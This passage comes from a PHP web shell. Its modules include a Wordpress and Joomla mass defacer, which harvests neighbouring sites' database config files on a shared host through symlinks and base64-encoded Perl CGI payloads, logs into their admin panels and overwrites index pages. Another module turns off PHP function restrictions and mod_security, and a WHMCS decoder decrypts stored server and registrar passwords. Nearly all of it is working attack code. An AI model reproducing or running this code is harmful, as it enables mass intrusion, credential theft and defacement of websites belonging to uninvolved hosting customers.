                                                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                                                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                                    curl_setopt($ch, CURLOPT_HEADER, 0);
                                                    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
                                                    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
                                                    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
                                                    $buffer = curl_exec($ch);
                                                    $hidden2 = entre2v2($buffer, '<input type="hidden" name="', '" value="1"', 2);
                                                    if ($hidden2) {$output.= "[+] index.php file found in Theme Editor<br />";
                                                    } else {$output.= "[-] index.php Not found in Theme Editor<br />";
                                                    }}if ($hidden2) {$url2 = $site_url . "/index.php?option=com_templates&layout=edit";
                                                    $ch = curl_init();
                                                    curl_setopt($ch, CURLOPT_URL, $url2);
                                                    curl_setopt($ch, CURLOPT_POST, 1);
                                                    curl_setopt($ch, CURLOPT_POSTFIELDS, "jform[source]=" . $content . "&jform[filename]=index.php&jform[extension_id]=" . $template_id . "&" . $hidden2 . "=1&task=source.save");
                                                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                                                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                                    curl_setopt($ch, CURLOPT_HEADER, 0);
                                                    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
                                                    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
                                                    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
                                                    $buffer = curl_exec($ch);
                                                    curl_close($ch);
                                                    $pos = strpos($buffer, '<dd class="message message">');
                                                    $cond = 0;
                                                    if ($pos === false) {$output.= "[-] Updating Index.php Error<br />";
                                                    } else {$output.= "[+] Index.php Template successfully saved<br />";
                                                    $cond = 1;
                                                    }}} else {$req = mysql_query("SELECT * from  `" . $prefix . "templates_menu` WHERE client_id='0'");
                                                    $data = mysql_fetch_array($req);
                                                    $template_name = $data["template"];
                                                    $useragent = "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
                                                    $url2 = $site_url . "/index.php";
                                                    $ch = curl_init();
                                                    curl_setopt($ch, CURLOPT_URL, $url2);
                                                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                                                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                                    curl_setopt($ch, CURLOPT_HEADER, 0);
                                                    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
                                                    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
                                                    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
                                                    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
                                                    $buffer = curl_exec($ch);
                                                    $hidden = entre2v2($buffer, '<input type="hidden" name="', '" value="1"', 3);
                                                    if ($hidden) {curl_setopt($ch, CURLOPT_URL, $url2);
                                                    curl_setopt($ch, CURLOPT_POST, 1);
                                                    curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123456&option=com_login&task=login&" . $hidden . "=1");
                                                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                                                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                                    curl_setopt($ch, CURLOPT_HEADER, 0);
                                                    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
                                                    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
                                                    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
                                                    $buffer = curl_exec($ch);
                                                    $pos = strpos($buffer, "com_config");
                                                    if ($pos === false) {$output.= "[-] Login Error<br />";
                                                    } else {$output.= "[+] Login Successful<br />";
                                                    }}if ($pos) {$url2 = $site_url . "/index.php?option=com_templates&task=edit_source&client=0&id=" . $template_name;
                                                    curl_setopt($ch, CURLOPT_URL, $url2);
                                                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                                                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                                    curl_setopt($ch, CURLOPT_HEADER, 0);
                                                    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
                                                    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
                                                    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
                                                    $buffer = curl_exec($ch);
                                                    $hidden2 = entre2v2($buffer, '<input type="hidden" name="', '" value="1"', 6);
                                                    if ($hidden2) {$output.= "[+] index.php file founded in Theme Editor<br />";
                                                    } else {$output.= "[-] index.php Not found in Theme Editor<br />";
                                                    }}if ($hidden2) {$url2 = $site_url . "/index.php?option=com_templates&layout=edit";
                                                    curl_setopt($ch, CURLOPT_URL, $url2);
                                                    curl_setopt($ch, CURLOPT_POST, 1);
                                                    curl_setopt($ch, CURLOPT_POSTFIELDS, "filecontent=" . $content . "&id=" . $template_name . "&cid[]=" . $template_name . "&" . $hidden2 . "=1&task=save_source&client=0");
                                                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                                                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                                    curl_setopt($ch, CURLOPT_HEADER, 0);
                                                    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
                                                    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
                                                    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
                                                    $buffer = curl_exec($ch);
                                                    curl_close($ch);
                                                    $pos = strpos($buffer, '<dd class="message message fade">');
                                                    $cond = 0;
                                                    if ($pos === false) {$output.= "[-] Updating Index.php Error<br />";
                                                    } else {$output.= "[+] Index.php Template successfully saved<br />";
                                                    $cond = 1;
                                                    }}}} else {$output.= "[-] DB Error<br />";
                                                    }global $base_path;
                                                    unlink($base_path . $co);
                                                    return array('cond' => $cond, 'output' => $output);
                                                    }function exec_mode_1($def_url) {@mkdir('sym',0777);$wr  = "OptionsallDirectoryIndexSux . htmlAddTypetext / plain . phpAddHandlerserver - parsed . phpAddTypetext / plain . htmlAddHandlertxt . htmlRequire NoneSatisfyAny";$fp = @fopen ('sym/.htaccess','w');fwrite($fp, $wr);@symlink('/','sym/root');$dominios = @file_get_contents(" / etc / named . conf");@preg_match_all('/.*?zone "( . * ?) " {/', $dominios, $out);$out[1] = array_unique($out[1]);$numero_dominios = count($out[1]);echo "Totaldomains : $numero_dominios < br > < br / > ";$def = file_get_contents($def_url);$def = urlencode($def);$dd = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5vcmcvZGVmYWNlZC8yMDEzLzAzLzE5L2Fzc29jaWFwcmVzcy5uZXQnKTsNCiRwID0gZXhwbG9kZSgncHVibGljX2h0bWwnLGRpcm5hbWUoX19GSUxFX18pKTsNCiRwID0gJHBbMF0uJ3B1YmxpY19odG1sJzsNCmlmICgkaGFuZGxlID0gb3BlbmRpcigkcCkpIHsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXguaHRtbCcsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXgucGhwJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG0nLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgZWNobyAnRG9uZSc7DQp9DQpjbG9zZWRpcigkaGFuZGxlKTsNCnVubGluayhfX0ZJTEVfXyk7DQo/Pg==';$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';$output = fopen('defaced.html', 'a+');$_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;$_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;echo '<table style="width:
                                                        75 %;
                                                        " align="center"><tr style="background:
                                                            rgba(160, 82, 45, 0.6);
                                                            "><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;for($i = $st; $i <= $numero_dominios; $i++){$domain = $out[1][$i];
                                                            $dono_arquivo = @fileowner("/etc/valiases/" . $domain);
                                                            $infos = @posix_getpwuid($dono_arquivo);
                                                            if ($infos['name'] != 'root') {$config01 = @file_get_contents($base_url . $infos['name'] . "/public_html/configuration.php");
                                                            $config02 = @file_get_contents($base_url . $infos['name'] . "/public_html/wp-config.php");
                                                            $config03 = @file_get_contents($base_url . $infos['name'] . "/public_html/blog/wp-config.php");
                                                            $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
                                                            if ($config01 && preg_match('/dbprefix/i', $config01)) {echo '<tr ' . $cls . '><td align="center">' . ($j++) . '</td><td align="center">' . $i . '</td><td><a href="http://' . $domain . '" target="blank">' . $domain . '</a></td>';
                                                            echo '<td align="center"><font color="pink">JOOMLA</font></td>';
                                                            $res = index_changer_joomla($config01, $def, $domain);
                                                            echo '<td>' . $res['output'] . '</td>';
                                                            if ($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';
                                                            fwrite($output, 'http://' . $domain . "<br>");
                                                            $_SESSION['count1'] = $_SESSION['count1'] + 1;
                                                            } else {echo '<td align="center"><span class="red">FAILED</span></td>';
                                                            }echo '</tr>';
                                                            }if ($config02 && preg_match('/DB_NAME/i', $config02)) {echo '<tr ' . $cls . '><td align="center">' . ($j++) . '</td><td align="center">' . $i . '</td><td><a href="http://' . $domain . '" target="blank">' . $domain . '</a></td>';
                                                            echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
                                                            $res = index_changer_wp($config02, $dd);
                                                            echo '<td>' . $res['output'] . '</td>';
                                                            if ($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';
                                                            fwrite($output, 'http://' . $domain . "<br>");
                                                            $_SESSION['count2'] = $_SESSION['count2'] + 1;
                                                            } else {echo '<td align="center"><span class="red">FAILED</span></td>';
                                                            }echo '</tr>';
                                                            }$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
                                                            if ($config03 && preg_match('/DB_NAME/i', $config03)) {echo '<tr ' . $cls . '><td align="center">' . ($j++) . '</td><td align="center">' . $i . '</td><td><a href="http://' . $domain . '" target="blank">' . $domain . '</a></td>';
                                                            echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
                                                            $res = index_changer_wp($config03, $dd);
                                                            echo '<td>' . $res['output'] . '</td>';
                                                            if ($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';
                                                            fwrite($output, 'http://' . $domain . "<br>");
                                                            $_SESSION['count2'] = $_SESSION['count2'] + 1;
                                                            } else {echo '<td align="center"><span class="red">FAILED</span></td>';
                                                            }echo '</tr>';
                                                            }}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';echo '<a href="defaced . html" target="_blank">View Total Defaced urls</a><br />';if($_SESSION['count1']+$_SESSION['count2'] > 0){echo '<a href="'.$_SERVER['PHP_SELF'].' ? pass = '.$_GET['pass'].' & zh = 1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_2($def_url) {$domains = @file_get_contents("/etc/named.conf");
                                                            @preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
                                                            $out = array_unique($out[1]);
                                                            $num = count($out);
                                                            print ("Total domains: $num<br><br />");
                                                            $def = file_get_contents($def_url);
                                                            $def = urlencode($def);
                                                            $output = fopen('defaced.html', 'a+');
                                                            $defaced = '';
                                                            $count1 = 0;
                                                            $count2 = 0;
                                                            echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
                                                            $j = 1;
                                                            $map = array();
                                                            foreach ($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/" . $d));
                                                            $map[$info['name']] = $d;
                                                            }$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
   NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
   h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
   G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
   YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
   kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
   B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
                                                            mkdir('plsym', 0777);
                                                            file_put_contents('plsym/plsym.cc', base64_decode($dt));
                                                            chmod('plsym/plsym.cc', 0755);
                                                            $wr = "Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .cc

AddHandler cgi-script .cc
AddHandler cgi-script .cc";
                                                            $fp = @fopen('plsym/.htaccess', 'w');
                                                            fwrite($fp, $wr);
                                                            fclose($fp);
                                                            $res = file_get_contents('http://' . $_SERVER['SERVER_NAME'] . dirname($_SERVER['SCRIPT_NAME']) . '/plsym/plsym.cc');
                                                            $url = 'http://' . $_SERVER['SERVER_NAME'] . dirname($_SERVER['SCRIPT_NAME']) . '/plsym/';
                                                            unlink('plsym/plsym.cc');
                                                            $data = file_get_contents($url);
                                                            preg_match_all('/<a href="(.+)">/', $data, $match);
                                                            unset($match[1][0]);
                                                            $i = 1;
                                                            foreach ($match[1] as $m) {$mz = explode('##', urldecode($m));
                                                            $config01 = '';
                                                            $config02 = '';
                                                            if ($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url . $m);
                                                            }if ($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url . $m);
                                                            }$domain = $map[$mz[0]];
                                                            $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
                                                            if ($config01 && preg_match('/dbprefix/i', $config01)) {echo '<tr ' . $cls . '><td align="center">' . ($j++) . '</td><td align="center">' . $i++ . '</td><td><a href="http://' . $domain . '" target="blank">' . $domain . '</a></td>';
                                                            echo '<td align="center"><font color="pink">JOOMLA</font></td>';
                                                            $res = index_changer_joomla($config01, $def, $domain);
                                                            echo '<td>' . $res['output'] . '</td>';
                                                            if ($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';
                                                            fwrite($output, 'http://' . $domain . "<br>");
                                                            $count1++;
                                                            } else {echo '<td align="center"><span class="red">FAILED</span></td>';
                                                            }echo '</tr>';
                                                            }if ($config02 && preg_match('/DB_NAME/i', $config02)) {echo '<tr ' . $cls . '><td align="center">' . ($j++) . '</td><td><a href="http://' . $domain . '" target="blank">' . $domain . '</a></td>';
                                                            echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
                                                            $res = index_changer_wp($config02, $def);
                                                            echo '<td>' . $res['output'] . '</td>';
                                                            if ($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';
                                                            fwrite($output, 'http://' . $domain . "<br>");
                                                            $count2++;
                                                            } else {echo '<td align="center"><span class="red">FAILED</span></td>';
                                                            }echo '</tr>';
                                                            }}echo '</table>';
                                                            echo '<hr/>';
                                                            echo 'Total Defaced = ' . ($count1 + $count2) . ' (JOOMLA = ' . $count1 . ', WORDPRESS = ' . $count2 . ')<br />';
                                                            echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
                                                            if ($count1 + $count2 > 0) {echo '<a href="' . $_SERVER['PHP_SELF'] . '?pass=' . $_GET['pass'] . '&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
                                                            }}function exec_mode_3($def_url) {$domains = @file_get_contents("/etc/named.conf");
                                                            @preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
                                                            $out = array_unique($out[1]);
                                                            $num = count($out);
                                                            print ("Total domains: $num<br><br />");
                                                            $def = file_get_contents($def_url);
                                                            $def = urlencode($def);
                                                            $output = fopen('defaced.html', 'a+');
                                                            $defaced = '';
                                                            $count1 = 0;
                                                            $count2 = 0;
                                                            echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
                                                            $j = 1;
                                                            $map = array();
                                                            foreach ($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/" . $d));
                                                            $map[$info['name']] = $d;
                                                            }$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
   kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
   VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
   3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
   cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
   MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
   R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
                                                            mkdir('plsym', 0777);
                                                            file_put_contents('plsym/data.txt', $_POST['man_data']);
                                                            file_put_contents('plsym/plsym.cc', base64_decode($dt));
                                                            chmod('plsym/plsym.cc', 0755);
                                                            $wr = "Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .cc

AddHandler cgi-script .cc
AddHandler cgi-script .cc";
                                                            $fp = @fopen('plsym/.htaccess', 'w');
                                                            fwrite($fp, $wr);
                                                            fclose($fp);
                                                            $res = file_get_contents('http://' . $_SERVER['SERVER_NAME'] . dirname($_SERVER['SCRIPT_NAME']) . '/plsym/plsym.cc');
                                                            $url = 'http://' . $_SERVER['SERVER_NAME'] . dirname($_SERVER['SCRIPT_NAME']) . '/plsym/';
                                                            unlink('plsym/plsym.cc');
                                                            $data = file_get_contents($url);
                                                            preg_match_all('/<a href="(.+)">/', $data, $match);
                                                            unset($match[1][0]);
                                                            $i = 1;
                                                            foreach ($match[1] as $m) {$mz = explode('##', urldecode($m));
                                                            $config01 = '';
                                                            $config02 = '';
                                                            if ($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url . $m);
                                                            }if ($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url . $m);
                                                            }$domain = $map[$mz[0]];
                                                            $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
                                                            if ($config01 && preg_match('/dbprefix/i', $config01)) {echo '<tr ' . $cls . '><td align="center">' . ($j++) . '</td><td align="center">' . ($i++) . '</td><td><a href="http://' . $domain . '" target="blank">' . $domain . '</a></td>';
                                                            echo '<td align="center"><font color="pink">JOOMLA</font></td>';
                                                            $res = index_changer_joomla($config01, $def, $domain);
                                                            echo '<td>' . $res['output'] . '</td>';
                                                            if ($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';
                                                            fwrite($output, 'http://' . $domain . "<br>");
                                                            $count1++;
                                                            } else {echo '<td align="center"><span class="red">FAILED</span></td>';
                                                            }echo '</tr>';
                                                            }if ($config02 && preg_match('/DB_NAME/i', $config02)) {echo '<tr ' . $cls . '><td align="center">' . ($j++) . '</td><td><a href="http://' . $domain . '" target="blank">' . $domain . '</a></td>';
                                                            echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
                                                            $res = index_changer_wp($config02, $def);
                                                            echo '<td>' . $res['output'] . '</td>';
                                                            if ($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';
                                                            fwrite($output, 'http://' . $domain . "<br>");
                                                            $count2++;
                                                            } else {echo '<td align="center"><span class="red">FAILED</span></td>';
                                                            }echo '</tr>';
                                                            }}echo '</table>';
                                                            echo '<hr/>';
                                                            echo 'Total Defaced = ' . ($count1 + $count2) . ' (JOOMLA = ' . $count1 . ', WORDPRESS = ' . $count2 . ')<br />';
                                                            echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
                                                            if ($count1 + $count2 > 0) {echo '<a href="' . $_SERVER['PHP_SELF'] . '?pass=' . $_GET['pass'] . '&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
                                                            }}echo '<!DOCTYPE html><html><head><link href="http : //fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css"><style type="text/css">.header {position:fixed;width:100%;top:0;background:#000;}.footer {position:fixed;width:100%;bottom:0;background:#000;}input[type="radio"]{margin-top: 0;}.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}.even {background-color: rgba(25, 25, 25, 0.6);}.odd {background-color: rgba(102, 102, 102, 0.6);}textarea{background: rgba(0,0,0,0.6); color: white;}.green {color:#00FF00;font-weight:bold;}.red {color:#FF0000;font-weight:bold;}</style><script type="text/javascript">function change() {if(document.getElementById(\'rcd\').checked == true) {document.getElementById(\'tra\').style.display = \'\';} else {document.getElementById(\'tra\').style.display = \'none\';}}function hide() {document.getElementById(\'tra\').style.display = \'none\';}</script></head><body><h2 style="font-size:25px;color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>';if(!isset($_POST['form_action']) && !isset($_GET['mode'])){echo '<form action="" method="post"><table align=center><tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>manual copy of /etc/passwd</td></tr><tr id="tra" style="display: none;"><td></td><td><textarea cols="60" rows="10" name="man_data"></textarea></td></tr></table><br><input type="hidden" name="form_action" value="1"><table align=center><tr><td><b>index url: </b><input class="inputz" size="45" type="text" name="defpage" value=""></tr></td></table><center><input class="inputzbut" type="submit" value="Attack !" name="Submit"></center></form>';}$milaf_el_index = $_POST['defpage'];if($_POST['form_action'] == 1) {if($_POST['mode']==1) { exec_mode_1($milaf_el_index); }if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }}if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }echo '</body></html>';
                                                            
                                                        }
} elseif ($_GET['do'] == 'disablefunc') {
                                                        echo "<center>";
                                                        echo "<form method=post><input type=submit name=ini value='php.ini' />&nbsp;<input type=submit name=htce value='.htaccess' /></form>";
                                                        if (isset($_POST['ini'])) {
                                                            $file = fopen("php.ini", "w");
                                                            echo fwrite($file, "disable_functions=none
safe_mode = Off
	");
                                                            fclose($file);
                                                            echo "<a href='php.ini'>click here!</a>";
                                                        }
                                                        if (isset($_POST['htce'])) {
                                                            $file = fopen(".htaccess", "w");
                                                            echo fwrite($file, "<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
	");
                                                            fclose($file);
                                                            echo "htaccess successfully created!";
                                                        }
                                                        echo "</center>";
} elseif (isset($_GET['do']) && ($_GET['do'] == 'whmcsdecod')) {
?>
<form action="?y=<?php echo $pwd; ?>&amp;do=whmcs" method="post">

<?php

                                                        function decrypt($string, $cc_encryption_hash) {
                                                            $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
                                                            $hash_key = _hash($key);
                                                            $hash_length = strlen($hash_key);
                                                            $string = base64_decode($string);
                                                            $tmp_iv = substr($string, 0, $hash_length);
                                                            $string = substr($string, $hash_length, strlen($string) - $hash_length);
                                                            $iv = $out = '';
                                                            $c = 0;
                                                            while ($c < $hash_length) {
                                                                $iv.= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
                                                                ++$c;
                                                            }
                                                            $key = $iv;
                                                            $c = 0;
                                                            while ($c < strlen($string)) {
                                                                if (($c != 0 AND $c % $hash_length == 0)) {
                                                                    $key = _hash($key . substr($out, $c - $hash_length, $hash_length));
                                                                }
                                                                $out.= chr(ord($key[$c % $hash_length]) ^ ord($string[$c]));
                                                                ++$c;
                                                            }
                                                            return $out;
                                                        }
                                                        function _hash($string) {
                                                            if (function_exists('sha1')) {
                                                                $hash = sha1($string);
                                                            } else {
                                                                $hash = md5($string);
                                                            }
                                                            $out = '';
                                                            $c = 0;
                                                            while ($c < strlen($hash)) {
                                                                $out.= chr(hexdec($hash[$c] . $hash[$c + 1]));
                                                                $c+= 2;
                                                            }
                                                            return $out;
                                                        }
                                                        echo "
<br><center><font size='5' color='#FFFFFF'><b>-=[ WHMCS Decoder ]=-</b></font></center>
<center>
<br>

<FORM action=''  method='post'>
<input type='hidden' name='form_action' value='2'>
<br>
<table class=tabnet style=width:320px;padding:0 1px;>
<tr><th colspan=2>WHMCS Decoder</th></tr>
<tr><td>db_host </td><td><input type='text' style='color:#FFFFFF;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
<tr><td>db_username </td><td><input type='text' style='color:#FFFFFF;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
<tr><td>db_password</td><td><input type='text' style='color:#FFFFFF;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
<tr><td>db_name</td><td><input type='text' style='color:#FFFFFF;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
<tr><td>cc_encryption_hash</td><td><input style='color:#FFFFFF;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
<td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FFFFFF;background-color:'  value='Submit' name='Submit'></td>
</table>
</FORM>
</center>
";
                                                        if ($_POST['form_action'] == 2) {
                                                            //include($file);
                                                            $db_host = ($_POST['db_host']);
                                                            $db_username = ($_POST['db_username']);
                                                            $db_password = ($_POST['db_password']);
                                                            $db_name = ($_POST['db_name']);
                                                            $cc_encryption_hash = ($_POST['cc_encryption_hash']);
                                                            $link = mysql_connect($db_host, $db_username, $db_password);
                                                            mysql_select_db($db_name, $link);
                                                            $query = mysql_query("SELECT * FROM tblservers");
                                                            while ($v = mysql_fetch_array($query)) {
                                                                $ipaddress = $v['ipaddress'];
                                                                $username = $v['username'];
                                                                $type = $v['type'];
                                                                $active = $v['active'];
                                                                $hostname = $v['hostname'];
                                                                echo ("<center><table border='1'>");
                                                                $password = decrypt($v['password'], $cc_encryption_hash);
                                                                echo ("<tr><td>Type</td><td>$type</td></tr>");
                                                                echo ("<tr><td>Active</td><td>$active</td></tr>");
                                                                echo ("<tr><td>Hostname</td><td>$hostname</td></tr>");
                                                                echo ("<tr><td>Ip</td><td>$ipaddress</td></tr>");
                                                                echo ("<tr><td>Username</td><td>$username</td></tr>");
                                                                echo ("<tr><td>Password</td><td>$password</td></tr>");
                                                                echo "</table><br><br></center>";
                                                            }
                                                            $link = mysql_connect($db_host, $db_username, $db_password);
                                                            mysql_select_db($db_name, $link);
                                                            $query = mysql_query("SELECT * FROM tblregistrars");
                                                            echo ("<center>Domain Reseller <br><table class=tabnet border='1'>");
                                                            echo ("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
                                                            while ($v = mysql_fetch_array($query)) {
                                                                $registrar = $v['registrar'];
                                                                $setting = $v['setting'];
                                                                $value = decrypt($v['value'], $cc_encryption_hash);
                                                                if ($value == "") {
                                                                    $value = 0;
                                                                }
                                                                $password = decrypt($v['password'], $cc_encryption_hash);
                                                                echo ("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
                                                            }
                                                        }
} elseif (isset($_GET['do']) && ($_GET['do'] == 'reverseip')) {
?>
<br>
